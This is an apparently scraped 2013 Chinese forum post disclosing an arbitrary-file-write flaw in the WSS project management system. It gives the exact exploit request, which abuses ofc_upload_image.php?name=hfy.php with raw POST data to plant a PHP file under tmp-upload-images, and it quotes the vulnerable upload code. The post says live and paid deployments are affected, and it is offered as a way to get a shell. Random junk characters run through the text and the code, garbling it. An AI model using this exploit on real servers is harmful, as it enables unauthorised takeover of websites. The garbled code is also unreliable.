标题: WSS项目管理系统Post get shell [打印本页] 作者: admin 时间: 2013-2-23 12:38 标题: WSS项目管理系统Post get shell POST 数据漏洞文件执行任意后缀文件保存- R% g9 G: o# [. ?
漏洞文件/chart/php-ofc-library/ofc_upload_image.php ! |$ N3 N8 \5 N( V! M2 J f% ^8 ^" [" e5 c. X! [5 Q% z
利用: ; Z, e8 P. u5 k1 Y+ c: ^7 Q/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名: b1 p9 e! {% g3 _ m" K
2 H9 @ G4 R( E$ x4 a0 T/ \9 _
Post任意数据# P' O5 h5 K3 Z, {" A4 m* Y
保存位置http://localhost/chart/tmp-upload-images/hfy.php% t* a7 Y! n( I5 X( e# w) {
[attach]201[/attach]1 B4 j0 [: A- [ Y
[attach]202[/attach]5 ^3 C+ K/ g; ?6 ?0 P1 {4 p3 J
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~3 G/ Z7 A( n. `, V
O, G' Z% M3 R( ]7 j; ^4 \
<?php3 T/ ~! Z5 _$ t5 @. M: ?. K# X
0 d: L' t2 d$ y0 u; y0 {//: B& t- B0 n( @9 V$ u+ i
// In Open Flash Chart -> save_image debug mode, you # R& v4 e* C) ^" Z3 l$ r// will see the 'echo' text in a new window. 3 E( f8 A8 b2 B' |/ w' o7 M; g3 c//; o5 G2 H1 g& _/ G6 \/ q
0 {) a* ^$ g/ P9 W( N3 y
/*( c' E( ?! v1 N2 S
+ D( K' i; {6 k. [5 Q9 s// full path to the saved image including filename //+ ]0 Q' w* ]+ u) r5 r. a
$destination = $default_path . basename( $_GET[ 'name' ] ); 0 O+ ^6 l6 W, h6 p K4 R
% v% L& Q+ D# B1 U. V* { g// ' |8 z+ O- P4 j9 p# C* S// POST data is usually string data, but we are passing a RAW .png' \2 E; t5 h9 a8 p
// so PHP is a bit confused and $_POST is empty. But it has saved, J7 ^- {6 E; s2 H/ \: @
// the raw bits into $HTTP_RAW_POST_DATA7 R \" w4 c6 V6 V
//3 h" W6 j! k# f( a+ B
8 {3 E% ~- `% f+ s D( i( d
$jfh = fopen($destination, 'w') or die("can't open file");1 m+ P. i' f) h. z/ @
fwrite($jfh, $HTTP_RAW_POST_DATA); 7 C' q, f6 b( s) m4 Afclose($jfh); 1 \# C3 ~7 A$ q- v4 m f# x9 d+ L% E1 ], Z$ b
//! y5 o5 J6 p( \% r6 Z5 r" P9 o
// LOOK:, O2 u! r1 \/ A6 B
// o- f* a2 f Oexit();4 b5 l# ?2 x7 J H
//1 y4 t0 i* k1 C: k% {3 S5 P: y
// PHP5: 3 F P: V' y7 y9 F+ \! u: k//$ ]; ~, c" E# b4 _! Q, S! n0 T! u2 o
. A* }, r9 D7 R6 V6 }
* M9 _9 x9 d1 ~+ _5 G. t/ F- k// default path for the image to be stored //+ Z% d9 D: g( r7 O% n
$default_path = 'tmp-upload-images/'; + z* T# g. t6 Q2 X 3 J1 }& ]' O! a$ F d1 t4 A& pif (!file_exists($default_path)) mkdir($default_path, 0777, true);* c/ e: \! ^; l
6 \5 m# @- S# `! d$ y) g// full path to the saved image including filename //) B: E' W2 I, ]0 t. g) N( B
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); , B) V, H0 b, }9 n7 N! P. E! S
: c" m' _0 h! }- m6 e7 j( I' Y# p// move the image into the specified directory // 8 G+ b; @& l$ }3 }if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { & O5 b$ [/ J+ w8 [0 G echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";( ~, ?. ^/ M6 k. n4 D
} else { , g: p4 r7 f0 X( \6 ? echo "FILE UPLOAD FAILED";7 T# N' G& S8 h. E3 e. k5 m
} ( M& h% g0 f) g% E6 D, f1 D( B7 s+ v5 g' {; j1 k